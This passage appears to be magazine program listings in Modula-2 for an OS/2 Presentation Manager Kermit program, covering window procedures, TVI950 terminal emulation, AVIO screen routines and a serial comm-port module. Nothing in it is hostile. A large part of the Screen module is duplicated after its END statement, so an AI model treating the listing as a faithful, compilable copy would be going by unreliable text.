(* Force window to be maximized in terminal mode *) + + WinPostMsg (FrameWindow, WM_SETMAX, + MPARAM (0), MPARAM (0)); + ELSIF (NOT TermMode) AND + (BITSET (pswp^.fs) * BITSET (SWP_MAXIMIZE) # {}) THEN + (* Prevent maximized window EXCEPT in terminal mode *) + WinPostMsg (FrameWindow, WM_SETRESTORE, + MPARAM (0), MPARAM (0)); + ELSE + (* Do Nothing *) + END; + END; + RETURN WinDefWindowProc (hwnd, msg, mp1, mp2); + | WM_CREATE: + hdc := WinOpenWindowDC (hwnd); + VioCreatePS (frame_hvps, 25, 80, 0, FORMAT_CGA, 0); + VioCreatePS (child_hvps, 16, 40, 0, FORMAT_CGA, 0); + DosCreateThread (TermThrProc, TermThr, ADR (TermStack[STKSIZE])); + DosSuspendThread (TermThr); + RETURN 0; + | WM_INITMENU: + Check (ColorSet); + RETURN 0; + | WM_COMMAND: + DoMenu (hwnd, mp1); + RETURN 0; + | WM_TERMQUIT: + TermMode := FALSE; + DosSuspendThread (TermThr); + VioAssociate (0, hvps); + (* Restore The Window *) + SetRestore; + Enable (IDM_CONNECT); + Enable (IDM_SEND); + Enable (IDM_REC); + Enable (IDM_DIR); + Enable (IDM_OPTIONS); + Enable (IDM_COLORS); + RETURN 0; + | WM_TERM: + PutPortChar (CHR (mp1.W1)); (* To Screen *) + RETURN 0; + | WM_CHAR: + IF TermMode THEN + IF KeyTranslate (mp1, mp2, c1, c2) THEN + PutKbdChar (c1, c2); (* To Port *) + RETURN 0; + ELSE + RETURN WinDefAVioWindowProc (hwnd, msg, mp1, mp2); + END; + ELSE + RETURN WinDefWindowProc (hwnd, msg, mp1, mp2); + END; + | WM_PAINT: + hps := WinBeginPaint (hwnd, NULL, NullRectl); + GpiErase (hps); + VioShowPS (25, 80, 0, hvps); + WinEndPaint (hps); + RETURN 0; + | WM_SIZE: + IF TermMode THEN + RETURN WinDefAVioWindowProc (hwnd, msg, mp1, mp2); + ELSE + RETURN WinDefWindowProc (hwnd, msg, mp1, mp2); + END; + | WM_DESTROY: + VioDestroyPS (frame_hvps); + VioDestroyPS (child_hvps); + RETURN 0; + ELSE + RETURN WinDefWindowProc (hwnd, msg, mp1, mp2); + END; + END WindowProc; + + + PROCEDURE ChildWindowProc ['ChildWindowProc'] ( + (* Window Procedure for Send/Receive child windows *) + hwnd : HWND; + msg : USHORT; + mp1 [VALUE] : MPARAM; + mp2 [VALUE] : MPARAM) : MRESULT [LONG, WINDOWS]; + + VAR + mp : USHORT; + hps : HPS; + c1, c2 : CHAR; + NullRectl [0:0] : RECTL; + + BEGIN + CASE msg OF + WM_PAINT: + hps := WinBeginPaint (hwnd, NULL, NullRectl); + GpiErase (hps); + VioShowPS (16, 40, 0, hvps); + WinEndPaint (hps); + RETURN 0; + | WM_CHAR: + IF KeyTranslate (mp1, mp2, c1, c2) AND (c1 = ESC) THEN + Aborted := TRUE; + RETURN 0; + ELSE + RETURN WinDefWindowProc (hwnd, msg, mp1, mp2); + END; + | WM_PAD: + mp := mp1.W1; + IF (mp = PAD_Error) OR (mp = PAD_Quit) THEN + WriteLn; + IF mp = PAD_Error THEN + WinMessageBox (HWND_DESKTOP, hwnd, + ADR ("File Transfer Aborted"), + ADR (Class), 0, MB_OK + MB_ICONEXCLAMATION); + ELSE + WinMessageBox (HWND_DESKTOP, hwnd, + ADR ("File Transfer Completed"), + ADR (Class), 0, MB_OK + MB_ICONASTERISK); + END; + DosSleep (2000); + VioAssociate (0, hvps); + WinDestroyWindow(ChildFrameWindow); + Enable (IDM_CONNECT); + Enable (IDM_SEND); + Enable (IDM_REC); + Enable (IDM_DIR); + Enable (IDM_OPTIONS); + Enable (IDM_COLORS); + ELSE + DoPADMsg (mp1, mp2); + END; + RETURN 0; + | WM_DL: + DoDLMsg (mp1, mp2); + RETURN 0; + | WM_SIZE: + WinSetWindowPos (ChildFrameWindow, 0, + Pos.cx DIV 4, Pos.cy DIV 4, + Pos.cx DIV 2, Pos.cy DIV 2 - 3, + SWP_MOVE + SWP_SIZE); + RETURN WinDefAVioWindowProc (hwnd, msg, mp1, mp2); + ELSE + RETURN WinDefWindowProc (hwnd, msg, mp1, mp2); + END; + END ChildWindowProc; + + +BEGIN (* Module Initialization *) + WITH Settings[ID_COM1 - COM_OFF] DO + baudrate := ID_B1200; + parity := ID_EVEN; + databits := ID_DATA7; + stopbits := ID_STOP1; + END; + + WITH Settings[ID_COM2 - COM_OFF] DO + baudrate := ID_B19K2; + parity := ID_EVEN; + databits := ID_DATA7; + stopbits := ID_STOP1; + END; + PrevComPort := NONE; + comport := ID_COM1; + TermMode := FALSE; (* Not Initially in Terminal Emulation Mode *) +END Shell. + +[LISTING 10 - PART II] + +IMPLEMENTATION MODULE Term; (* TVI950 Terminal Emulation for Kermit *) + + FROM Drives IMPORT + SetDrive; + + FROM Directories IMPORT + FileAttributes, AttributeSet, DirectoryEntry, FindFirst, FindNext; + + FROM SYSTEM IMPORT + ADR; + + FROM DosCalls IMPORT + DosChDir, DosSleep; + + FROM Screen IMPORT + ClrScr, ClrEol, GotoXY, GetXY, + Right, Left, Up, Down, WriteAtt, WriteString, WriteLn, Write, + attribute, NORMAL, HIGHLIGHT, REVERSE; + + FROM PMWIN IMPORT + MPARAM, WinPostMsg; + + FROM Shell IMPORT + comport, FrameWindow; + + FROM KH IMPORT + COM_OFF; + + FROM CommPort IMPORT + CommStatus, GetChar, SendChar; + + FROM Strings IMPORT + Length, Concat; + + IMPORT ASCII; + + + CONST + (* Key codes: Note: F1 -- F12 are actually Shift-F1 -- Shift-F12 *) + F1 = 124C; + F2 = 125C; + F3 = 126C; + F4 = 127C; + F5 = 130C; + F6 = 131C; + F7 = 132C; + F8 = 133C; + F9 = 134C; + F10 = 135C; + F11 = 207C; + F12 = 210C; + AF1 = 213C; (* Alt-F1 *) + AF2 = 214C; (* Alt-F2 *) + INS = 122C; + DEL = 123C; + HOME = 107C; + PGDN = 121C; (* synonym for PF10 *) + PGUP = 111C; (* synonym for PF11 *) + ENDD = 117C; (* synonym for PF12 *) + UPARROW = 110C; + DOWNARROW = 120C; + LEFTARROW = 113C; + RIGHTARROW = 115C; + CtrlX = 30C; + CtrlCaret = 36C; + CtrlZ = 32C; + CtrlL = 14C; + CtrlH = 10C; + CtrlK = 13C; + CtrlJ = 12C; + CtrlV = 26C; + ESC = 33C; + BUFSIZE = 4096; (* character buffer used by term thread *) + + + VAR + commStat : CommStatus; + echo : (Off, Local, On); + newline: BOOLEAN; (* translate to *) + Insert : BOOLEAN; + MP1, MP2 : MPARAM; + + + PROCEDURE Dir (path : ARRAY OF CHAR); + (* Change drive and/or directory; display a directory (in wide format) *) + + VAR + gotFN : BOOLEAN; + filename : ARRAY [0..20] OF CHAR; + attr : AttributeSet; + ent : DirectoryEntry; + i, j, k : INTEGER; + + BEGIN + filename := ""; (* in case no directory change *) + i := Length (path); + IF (i > 2) AND (path[1] = ':') THEN (* drive specifier *) + DEC (i, 2); + SetDrive (ORD (CAP (path[0])) - ORD ('A')); + FOR j := 0 TO i DO (* strip off the drive specifier *) + path[j] := path[j + 2]; + END; + END; + IF i # 0 THEN + gotFN := FALSE; + WHILE (i >= 0) AND (path[i] # '\') DO + IF path[i] = '.' THEN + gotFN := TRUE; + END; + DEC (i); + END; + IF gotFN THEN + j := i + 1; + k := 0; + WHILE path[j] # 0C DO + filename[k] := path[j]; + INC (k); INC (j); + END; + filename[k] := 0C; + IF (i = -1) OR ((i = 0) AND (path[0] = '\')) THEN + INC (i); + END; + path[i] := 0C; + END; + END; + IF Length (path) # 0 THEN + DosChDir (ADR (path), 0); + END; + IF Length (filename) = 0 THEN + filename := "*.*"; + END; + attr := AttributeSet {ReadOnly, Directory, Archive}; + i := 1; (* keep track of position on line *) + + ClrScr; + gotFN := FindFirst (filename, attr, ent); + WHILE gotFN DO + WriteString (ent.name); + j := Length (ent.name); + WHILE j < 12 DO (* 12 is maximum length for "filename.typ" *) + Write (' '); + INC (j); + END; + INC (i); (* next position on this line *) + IF i > 5 THEN + i := 1; (* start again on new line *) + WriteLn; + ELSE + WriteString (" | "); + END; + gotFN := FindNext (ent); + END; + WriteLn; + END Dir; + + + PROCEDURE InitTerm; + (* Clear Screen, Home Cursor, Get Ready For Terminal Emulation *) + BEGIN + ClrScr; + Insert := FALSE; + attribute := NORMAL; + END InitTerm; + + + PROCEDURE PutKbdChar (ch1, ch2 : CHAR); + (* Process a character received from the keyboard *) + BEGIN + IF ch1 = ASCII.enq THEN (* Control-E *) + echo := On; + ELSIF ch1 = ASCII.ff THEN (* Control-L *) + echo := Local; + ELSIF ch1 = ASCII.dc4 THEN (* Control-T *) + echo := Off; + ELSIF ch1 = ASCII.so THEN (* Control-N *) + newline := TRUE; + ELSIF ch1 = ASCII.si THEN (* Control-O *) + newline := FALSE; + ELSIF (ch1 = ASCII.can) OR (ch1 = ESC) THEN + attribute := NORMAL; + WinPostMsg (FrameWindow, WM_TERMQUIT, MPARAM (0), MPARAM (0)); + ELSIF ch1 = 0C THEN + Function (ch2); + ELSE + commStat := SendChar (comport - COM_OFF, ch1, FALSE); + IF (echo = On) OR (echo = Local) THEN + WriteAtt (ch1); + END; + END; + END PutKbdChar; + + + PROCEDURE Function (ch : CHAR); + (* handles the function keys -- including PF1 - PF12, etc. *) + BEGIN + CASE ch OF + F1 : commStat := SendChar (comport - COM_OFF, ASCII.soh, FALSE); + commStat := SendChar (comport - COM_OFF, '@', FALSE); + commStat := SendChar (comport - COM_OFF, ASCII.cr, FALSE); + | F2 : commStat := SendChar (comport - COM_OFF, ASCII.soh, FALSE); + commStat := SendChar (comport - COM_OFF, 'A', FALSE); + commStat := SendChar (comport - COM_OFF, ASCII.cr, FALSE); + | F3 : commStat := SendChar (comport - COM_OFF, ASCII.soh, FALSE); + commStat := SendChar (comport - COM_OFF, 'B', FALSE); + commStat := SendChar (comport - COM_OFF, ASCII.cr, FALSE); + | F4 : commStat := SendChar (comport - COM_OFF, ASCII.soh, FALSE); + commStat := SendChar (comport - COM_OFF, 'C', FALSE); + commStat := SendChar (comport - COM_OFF, ASCII.cr, FALSE); + | F5 : commStat := SendChar (comport - COM_OFF, ASCII.soh, FALSE); + commStat := SendChar (comport - COM_OFF, 'D', FALSE); + commStat := SendChar (comport - COM_OFF, ASCII.cr, FALSE); + | F6 : commStat := SendChar (comport - COM_OFF, ASCII.soh, FALSE); + commStat := SendChar (comport - COM_OFF, 'E', FALSE); + commStat := SendChar (comport - COM_OFF, ASCII.cr, FALSE); + | F7 : commStat := SendChar (comport - COM_OFF, ASCII.soh, FALSE); + commStat := SendChar (comport - COM_OFF, 'F', FALSE); + commStat := SendChar (comport - COM_OFF, ASCII.cr, FALSE); + | F8 : commStat := SendChar (comport - COM_OFF, ASCII.soh, FALSE); + commStat := SendChar (comport - COM_OFF, 'G', FALSE); + commStat := SendChar (comport - COM_OFF, ASCII.cr, FALSE); + | F9 : commStat := SendChar (comport - COM_OFF, ASCII.soh, FALSE); + commStat := SendChar (comport - COM_OFF, 'H', FALSE); + commStat := SendChar (comport - COM_OFF, ASCII.cr, FALSE); + | F10, + PGDN: commStat := SendChar (comport - COM_OFF, ASCII.soh, FALSE); + commStat := SendChar (comport - COM_OFF, 'I', FALSE); + commStat := SendChar (comport - COM_OFF, ASCII.cr, FALSE); + | F11, + AF1, + PGUP: commStat := SendChar (comport - COM_OFF, ASCII.soh, FALSE); + commStat := SendChar (comport - COM_OFF, 'J', FALSE); + commStat := SendChar (comport - COM_OFF, ASCII.cr, FALSE); + | F12, + AF2, + ENDD: commStat := SendChar (comport - COM_OFF, ESC, FALSE); + commStat := SendChar (comport - COM_OFF, 'Q', FALSE); + | INS : IF NOT Insert THEN + commStat := SendChar (comport - COM_OFF, ESC, FALSE); + commStat := SendChar (comport - COM_OFF, 'E', FALSE); + END; + | DEL : commStat := SendChar (comport - COM_OFF, ESC, FALSE); + commStat := SendChar (comport - COM_OFF, 'R', FALSE); + | HOME : commStat := SendChar (comport - COM_OFF, CtrlZ, FALSE); + | UPARROW : commStat := SendChar (comport - COM_OFF, CtrlK, FALSE); + | DOWNARROW : commStat := SendChar (comport - COM_OFF, CtrlV, FALSE); + | LEFTARROW : commStat := SendChar (comport - COM_OFF, CtrlH, FALSE); + | RIGHTARROW : commStat := SendChar (comport - COM_OFF, CtrlL, FALSE); + ELSE + (* do nothing *) + END; + END Function; + + + PROCEDURE TermThrProc; + (* Thread to get characters from port, put into buffer *) + + VAR + ch : CHAR; + + BEGIN + LOOP + IF GetChar (comport - COM_OFF, ch) = Success THEN + MP1.W1 := ORD (ch); MP1.W2 := 0; + MP2.L := 0; + WinPostMsg (FrameWindow, WM_TERM, MP1, MP2); + ELSE + DosSleep (0); + END + END; + END TermThrProc; + + + VAR + EscState, CurState1, CurState2 : BOOLEAN; + CurChar1 : CHAR; + + PROCEDURE PutPortChar (ch : CHAR); + (* Process a character received from the port *) + BEGIN + IF EscState THEN + EscState := FALSE; + IF ch = '=' THEN + CurState1 := TRUE; + ELSE + Escape (ch); + END; + ELSIF CurState1 THEN + CurState1 := FALSE; + CurChar1 := ch; + CurState2 := TRUE; + ELSIF CurState2 THEN + CurState2 := FALSE; + Cursor (ch); + ELSE + CASE ch OF + CtrlCaret, CtrlZ : ClrScr; + | CtrlL : Right; + | CtrlH : Left; + | CtrlK : Up; + | CtrlJ : Down; + | ESC : EscState := TRUE; + ELSE + WriteAtt (ch); + IF newline AND (ch = ASCII.cr) THEN + WriteLn; + END; + END; + END; + IF echo = On THEN + commStat := SendChar (comport - COM_OFF, ch, FALSE); + END; + END PutPortChar; + + + PROCEDURE Escape (ch : CHAR); + (* handles escape sequences *) + BEGIN + CASE ch OF + '*' : ClrScr; + | 'T', 'R' : ClrEol; + | ')' : attribute := NORMAL; + | '(' : attribute := HIGHLIGHT; + | 'f' : InsertMsg; + | 'g' : InsertOn; + ELSE + (* ignore *) + END; + END Escape; + + + PROCEDURE Cursor (ch : CHAR); + (* handles cursor positioning *) + + VAR + x, y : CARDINAL; + + BEGIN + y := ORD (CurChar1) - 20H; + x := ORD (ch) - 20H; + GotoXY (x, y); (* adjust for HOME = (1, 1) *) + END Cursor; + + + VAR + cx, cy : CARDINAL; + + PROCEDURE InsertMsg; + (* get ready insert mode -- place a message at the bottom of the screen *) + BEGIN + IF NOT Insert THEN + GetXY (cx, cy); (* record current position *) + GotoXY (1, 24); + ClrEol; + attribute := REVERSE; + ELSE (* exit Insert mode *) + GetXY (cx, cy); + GotoXY (1, 24); + ClrEol; + GotoXY (cx, cy); + Insert := FALSE; + END; + END InsertMsg; + + + PROCEDURE InsertOn; + (* enter insert mode -- after INSERT MODE message is printed *) + BEGIN + attribute := NORMAL; + GotoXY (cx, cy); + Insert := TRUE; + END InsertOn; + + +BEGIN (* module initialization *) + echo := Off; + newline := FALSE; + Insert := FALSE; + EscState := FALSE; + CurState1 := FALSE; + CurState2 := FALSE; +END Term. + +[LISTING ELEVEN] + +IMPLEMENTATION MODULE Screen; +(* module to perform "low level" screen functions (via AVIO) *) + + IMPORT ASCII; + + FROM SYSTEM IMPORT + ADR; + + FROM Strings IMPORT + Length; + + FROM Conversions IMPORT + IntToString; + + FROM KH IMPORT + IDM_GREEN; + + FROM Vio IMPORT + VioSetCurPos, VioGetCurPos, VioScrollUp, + VioWrtNCell, VioWrtTTY, VioCell; + + + CONST + GREY = 07H; + WHITE = 0FH; + REV_GY = 70H; + GREEN = 02H; + LITE_GRN = 0AH; + REV_GRN = 20H; + AMBER = 06H; + LITE_AMB = 0EH; + REV_AMB = 60H; + RED = 0CH; + CY_BK = 0B0H; + CY_BL = 0B9H; + REV_RD = 0CFH; + REV_BL = 9FH; + MAGENTA = 05H; + + + VAR + (* From Definition Module + NORMAL : CARDINAL; + HIGHLIGHT : CARDINAL; + REVERSE : CARDINAL; + attribute : CARDINAL; + hvps : HVPS; + *) + x, y : CARDINAL; + bCell : VioCell; + + + PROCEDURE White; + (* Sets up colors: Monochrome White *) + BEGIN + NORMAL := GREY; + HIGHLIGHT := WHITE; + REVERSE := REV_GY; + attribute := NORMAL; + END White; + + + PROCEDURE Green; + (* Sets up colors: Monochrome Green *) + BEGIN + NORMAL := GREEN; + HIGHLIGHT := LITE_GRN; + REVERSE := REV_GRN; + attribute := NORMAL; + END Green; + + + PROCEDURE Amber; + (* Sets up colors: Monochrome Amber *) + BEGIN + NORMAL := AMBER; + HIGHLIGHT := LITE_AMB; + REVERSE := REV_AMB; + attribute := NORMAL; + END Amber; + + + PROCEDURE Color1; + (* Sets up colors: Blue, Red, Green *) + BEGIN + NORMAL := GREEN; + HIGHLIGHT := RED; + REVERSE := REV_BL; + attribute := NORMAL; + END Color1; + + + PROCEDURE Color2; + (* Sets up colors: Cyan Background; Black, Blue, White-on-Red *) + BEGIN + NORMAL := CY_BK; + HIGHLIGHT := CY_BL; + REVERSE := REV_RD; + attribute := NORMAL; + END Color2; + + + PROCEDURE HexToString (num : INTEGER; + size : CARDINAL; + VAR buf : ARRAY OF CHAR; + VAR I : CARDINAL; + VAR Done : BOOLEAN); + (* Local Procedure to convert a number to a string, represented in HEX *) + + CONST + ZERO = 30H; (* ASCII code *) + A = 41H; + + VAR + i : CARDINAL; + h : CARDINAL; + t : ARRAY [0..10] OF CHAR; + + BEGIN + i := 0; + REPEAT + h := num MOD 16; + IF h <= 9 THEN + t[i] := CHR (h + ZERO); + ELSE + t[i] := CHR (h - 10 + A); + END; + INC (i); + num := num DIV 16; + UNTIL num = 0; + + IF (size > HIGH (buf)) OR (i > HIGH (buf)) THEN + Done := FALSE; + RETURN; + ELSE + Done := TRUE; + END; + + WHILE size > i DO + buf[I] := '0'; (* pad with zeros *) + DEC (size); + INC (I); + END; + + WHILE i > 0 DO + DEC (i); + buf[I] := t[i]; + INC (I); + END; + + buf[I] := 0C; + END HexToString; + + + PROCEDURE ClrScr; + (* Clear the screen, and home the cursor *) + BEGIN + bCell.ch := ' '; (* space = blank screen *) + bCell.attr := CHR (NORMAL); (* Normal Video Attribute *) + VioScrollUp (0, 0, 24, 79, 25, bCell, hvps); + GotoXY (0, 0); + END ClrScr; + + + + PROCEDURE ClrEol; + (* clear from the current cursor position to the end of the line *) + BEGIN + GetXY (x, y); (* current cursor position *) + bCell.ch := ' '; (* space = blank *) + bCell.attr := CHR (NORMAL); (* Normal Video Attribute *) + VioScrollUp (y, x, y, 79, 1, bCell, hvps); + END ClrEol; + + + PROCEDURE Right; + (* move cursor to the right *) + BEGIN + GetXY (x, y); + INC (x); + GotoXY (x, y); + END Right; + + + PROCEDURE Left; + (* move cursor to the left *) + BEGIN + GetXY (x, y); + DEC (x); + GotoXY (x, y); + END Left; + + + PROCEDURE Up; + (* move cursor up *) + BEGIN + GetXY (x, y); + DEC (y); + GotoXY (x, y); + END Up; + + + PROCEDURE Down; + (* move cursor down *) + BEGIN + GetXY (x, y); + INC (y); + GotoXY (x, y); + END Down; + + + PROCEDURE GotoXY (col, row : CARDINAL); + (* position cursor at column, row *) + BEGIN + IF (col <= 79) AND (row <= 24) THEN + VioSetCurPos (row, col, hvps); + END; + END GotoXY; + + + PROCEDURE GetXY (VAR col, row : CARDINAL); + (* determine current cursor position *) + BEGIN + VioGetCurPos (row, col, hvps); + END GetXY; + + + PROCEDURE Write (c : CHAR); + (* Write a Character *) + BEGIN + WriteAtt (c); + END Write; + + + PROCEDURE WriteString (str : ARRAY OF CHAR); + (* Write String *) + + VAR + i : CARDINAL; + c : CHAR; + + BEGIN + i := 0; + c := str[i]; + WHILE c # 0C DO + Write (c); + INC (i); + c := str[i]; + END; + END WriteString; + + + PROCEDURE WriteInt (n : INTEGER; s : CARDINAL); + (* Write Integer *) + + VAR + i : CARDINAL; + b : BOOLEAN; + str : ARRAY [0..6] OF CHAR; + + BEGIN + i := 0; + IntToString (n, s, str, i, b); + WriteString (str); + END WriteInt; + + + PROCEDURE WriteHex (n, s : CARDINAL); + (* Write a Hexadecimal Number *) + + VAR + i : CARDINAL; + b : BOOLEAN; + str : ARRAY [0..6] OF CHAR; + + BEGIN + i := 0; + HexToString (n, s, str, i, b); + WriteString (str); + END WriteHex; + + + PROCEDURE WriteLn; + (* Write *) + BEGIN + Write (ASCII.cr); Write (ASCII.lf); + END WriteLn; + + + PROCEDURE WriteAtt (c : CHAR); + (* write character and attribute at cursor position *) + + VAR + s : ARRAY [0..1] OF CHAR; + + BEGIN + GetXY (x, y); + IF (c = ASCII.ht) THEN + bCell.ch := ' '; + bCell.attr := CHR (attribute); + REPEAT + VioWrtNCell (bCell, 1, y, x, hvps); + Right; + UNTIL (x MOD 8) = 0; + ELSIF (c = ASCII.cr) OR (c = ASCII.lf) + OR (c = ASCII.bel) OR (c = ASCII.bs) THEN + s[0] := c; s[1] := 0C; + VioWrtTTY (ADR (s), 1, hvps); + IF c = ASCII.lf THEN + ClrEol; + END; + ELSE + bCell.ch := c; + bCell.attr := CHR (attribute); + VioWrtNCell (bCell, 1, y, x, hvps); + Right; + END; + END WriteAtt; + +BEGIN (* module initialization *) + ColorSet := IDM_GREEN; + NORMAL := GREEN; + HIGHLIGHT := LITE_GRN; + REVERSE := REV_GRN; + attribute := NORMAL; +END Screen. +bCell.ch := ' '; (* space = blank *) + bCell.attr := CHR (NORMAL); (* Normal Video Attribute *) + VioScrollUp (y, x, y, 79, 1, bCell, hvps); + END ClrEol; + + + PROCEDURE Right; + (* move cursor to the right *) + BEGIN + GetXY (x, y); + INC (x); + GotoXY (x, y); + END Right; + + + PROCEDURE Left; + (* move cursor to the left *) + BEGIN + GetXY (x, y); + DEC (x); + GotoXY (x, y); + END Left; + + + PROCEDURE Up; + (* move cursor up *) + BEGIN + GetXY (x, y); + DEC (y); + GotoXY (x, y); + END Up; + + + PROCEDURE Down; + (* move cursor down *) + BEGIN + GetXY (x, y); + INC (y); + GotoXY (x, y); + END Down; + + + PROCEDURE GotoXY (col, row : CARDINAL); + (* position cursor at column, row *) + BEGIN + IF (col <= 79) AND (row <= 24) THEN + VioSetCurPos (row, col, hvps); + END; + END GotoXY; + + + PROCEDURE GetXY (VAR col, row : CARDINAL); + (* determine current cursor position *) + BEGIN + VioGetCurPos (row, col, hvps); + END GetXY; + + + PROCEDURE Write (c : CHAR); + (* Write a Character *) + BEGIN + WriteAtt (c); + END Write; + + + PROCEDURE WriteString (str : ARRAY OF CHAR); + (* Write String *) + + VAR + i : CARDINAL; + c : CHAR; + + BEGIN + i := 0; + c := str[i]; + WHILE c # 0C DO + Write (c); + INC (i); + c := str[i]; + END; + END WriteString; + + + PROCEDURE WriteInt (n : INTEGER; s : CARDINAL); + (* Write Integer *) + + VAR + i : CARDINAL; + b : BOOLEAN; + str : ARRAY [0..6] OF CHAR; + + BEGIN + i := 0; + IntToString (n, s, str, i, b); + WriteString (str); + END WriteInt; + + + PROCEDURE WriteHex (n, s : CARDINAL); + (* Write a Hexadecimal Number *) + + VAR + i : CARDINAL; + b : BOOLEAN; + str : ARRAY [0..6] OF CHAR; + + BEGIN + i := 0; + HexToString (n, s, str, i, b); + WriteString (str); + END WriteHex; + + + PROCEDURE WriteLn; + (* Write *) + BEGIN + Write (ASCII.cr); Write (ASCII.lf); + END WriteLn; + + + PROCEDURE WriteAtt (c : CHAR); + (* write character and attribute at cursor position *) + + VAR + s : ARRAY [0..1] OF CHAR; + + BEGIN + GetXY (x, y); + IF (c = ASCII.ht) THEN + bCell.ch := ' '; + bCell.attr := CHR (attribute); + REPEAT + VioWrtNCell (bCell, 1, y, x, hvps); + Right; + UNTIL (x MOD 8) = 0; + ELSIF (c = ASCII.cr) OR (c = ASCII.lf) + OR (c = ASCII.bel) OR (c = ASCII.bs) THEN + s[0] := c; s[1] := 0C; + VioWrtTTY (ADR (s), 1, hvps); + IF c = ASCII.lf THEN + ClrEol; + END; + ELSE + bCell.ch := c; + bCell.attr := CHR (attribute); + VioWrtNCell (bCell, 1, y, x, hvps); + Right; + END; + END WriteAtt; + +BEGIN (* module initialization *) + ColorSet := IDM_GREEN; + NORMAL := GREEN; + HIGHLIGHT := LITE_GRN; + REVERSE := REV_GRN; + attribute := NORMAL; +END Screen. + +[LISTING TWELVE] + +(**************************************************************************) +(* *) +(* Copyright (c) 1988, 1989 *) +(* by Stony Brook Software *) +(* and *) +(* Copyright (c) 1990 *) +(* by Brian R. Anderson *) +(* All rights reserved. *) +(* *) +(**************************************************************************) + +IMPLEMENTATION MODULE CommPort [7]; + + FROM SYSTEM IMPORT + ADR, BYTE, WORD, ADDRESS; + + FROM Storage IMPORT + ALLOCATE, DEALLOCATE; + + FROM DosCalls IMPORT + DosOpen, AttributeSet, DosDevIOCtl, DosClose, DosRead, DosWrite; + + + TYPE + CP = POINTER TO CHAR; + + VAR + pn : CARDINAL; + Handle : ARRAY [0..3] OF CARDINAL; + BufIn : ARRAY [0..3] OF CP; + BufOut : ARRAY [0..3] OF CP; + BufStart : ARRAY [0..3] OF CP; + BufLimit : ARRAY [0..3] OF CP; + BufSize : ARRAY [0..3] OF CARDINAL; + Temp : ARRAY [1..1024] OF CHAR; (* size of OS/2's serial queue *) + + + PROCEDURE CheckPort (portnum : CARDINAL) : BOOLEAN; + (* Check for a valid port number and open the port if it not alredy open *) + + CONST + PortName : ARRAY [0..3] OF ARRAY [0..4] OF CHAR = + [['COM1', 0C], ['COM2', 0C], ['COM3', 0C], ['COM4', 0C]]; + + VAR + Action : CARDINAL; + + BEGIN + (* check the port number *) + IF portnum > 3 THEN + RETURN FALSE; + END; + + (* attempt to open the port if it is not already open *) + IF Handle[portnum] = 0 THEN + IF DosOpen(ADR(PortName[portnum]), Handle[portnum], Action, 0, + AttributeSet{}, 1, 12H, 0) # 0 THEN + RETURN FALSE; + END; + END; + RETURN TRUE; + END CheckPort; + + + + PROCEDURE InitPort (portnum : CARDINAL; speed : BaudRate; data : DataBits; + stop : StopBits; check : Parity) : CommStatus; + (* Initialize a port *) + + CONST + Rate : ARRAY BaudRate OF CARDINAL = + [110, 150, 300, 600, 1200, 2400, 4800, 9600, 19200]; + TransParity : ARRAY Parity OF BYTE = [2, 1, 0]; + + TYPE + LineChar = RECORD + bDataBits : BYTE; + bParity : BYTE; + bStopBits : BYTE; + END; + + VAR + LC : LineChar; + + BEGIN + (* Check the port number *) + IF NOT CheckPort(portnum) THEN + RETURN InvalidPort; + END; + + (* Set the baud rate *) + IF DosDevIOCtl(0, ADR(Rate[speed]), 41H, 1, Handle[portnum]) # 0 THEN + RETURN InvalidParameter; + END; + + (* set the characteristics *) + LC.bDataBits := BYTE(data); + IF stop = 1 THEN + DEC (stop); (* 0x00 = 1 stop bits; 0x02 = 2 stop bits *) + END; + LC.bStopBits := BYTE(stop); + LC.bParity := TransParity[check]; + + IF DosDevIOCtl(0, ADR(LC), 42H, 1, Handle[portnum]) # 0 THEN + RETURN InvalidParameter; + END; + + RETURN Success; + END InitPort; + + + PROCEDURE StartReceiving (portnum, bufsize : CARDINAL) : CommStatus; + (* Start receiving characters on a port *) + BEGIN + IF NOT CheckPort(portnum) THEN + RETURN InvalidPort; + END; + IF BufStart[portnum] # NIL THEN + RETURN AlreadyReceiving; + END; + ALLOCATE (BufStart[portnum], bufsize); + BufIn[portnum] := BufStart[portnum]; + BufOut[portnum] := BufStart[portnum]; + BufLimit[portnum] := BufStart[portnum]; + INC (BufLimit[portnum]:ADDRESS, bufsize - 1); + BufSize[portnum] := bufsize; + RETURN Success; + END StartReceiving; + + + PROCEDURE StopReceiving (portnum : CARDINAL) : CommStatus; + (* Stop receiving characters on a port *) + BEGIN + IF NOT CheckPort(portnum) THEN + RETURN InvalidPort; + END; + IF BufStart[portnum] # NIL THEN + DEALLOCATE (BufStart[portnum], BufSize[portnum]); + BufLimit[portnum] := NIL; + BufIn[portnum] := NIL; + BufOut[portnum] := NIL; + BufSize[portnum] := 0; + END; + DosClose(Handle[portnum]); + Handle[portnum] := 0; + RETURN Success; + END StopReceiving; + + + PROCEDURE GetChar (portnum : CARDINAL; VAR ch : CHAR) : CommStatus; + (* Get a character from the comm port *) + + VAR + status : CARDINAL; + read : CARDINAL; + que : RECORD + ct : CARDINAL; + sz : CARDINAL; + END; + i : CARDINAL; + + BEGIN + IF BufStart[portnum] = NIL THEN + RETURN NotReceiving; + END; + IF NOT CheckPort(portnum) THEN + RETURN InvalidPort; + END; + status := DosDevIOCtl (ADR (que), 0, 68H, 1, Handle[portnum]); + IF (status = 0) AND (que.ct # 0) THEN + status := DosRead (Handle[portnum], ADR (Temp), que.ct, read); + IF (status # 0) OR (read = 0) THEN + RETURN NotReceiving; + END; + FOR i := 1 TO read DO + BufIn[portnum]^ := Temp[i]; + IF BufIn[portnum] = BufLimit[portnum] THEN + BufIn[portnum] := BufStart[portnum]; + ELSE + INC (BufIn[portnum]:ADDRESS); + END; + IF BufIn[portnum] = BufOut[portnum] THEN + RETURN BufferOverflow; + END; + END; + END; + + IF BufIn[portnum] = BufOut[portnum] THEN + RETURN NoCharacter; + END; + ch := BufOut[portnum]^; + IF BufOut[portnum] = BufLimit[portnum] THEN + BufOut[portnum] := BufStart[portnum]; + ELSE + INC (BufOut[portnum]:ADDRESS); + END; + RETURN Success; + END GetChar; + + + PROCEDURE SendChar (portnum : CARDINAL; ch : CHAR; + modem : BOOLEAN) : CommStatus; + (* send a character to the comm port *) + + VAR + wrote : CARDINAL; + status : CARDINAL; + commSt : CHAR; + + BEGIN + IF NOT CheckPort(portnum) THEN + RETURN InvalidPort; + END; + status := DosDevIOCtl (ADR (commSt), 0, 64H, 1, Handle[portnum]); + IF (status # 0) OR (commSt # 0C) THEN + RETURN TimeOut; + ELSE + status := DosWrite(Handle[portnum], ADR(ch), 1, wrote); + IF (status # 0) OR (wrote # 1) THEN + RETURN TimeOut; + 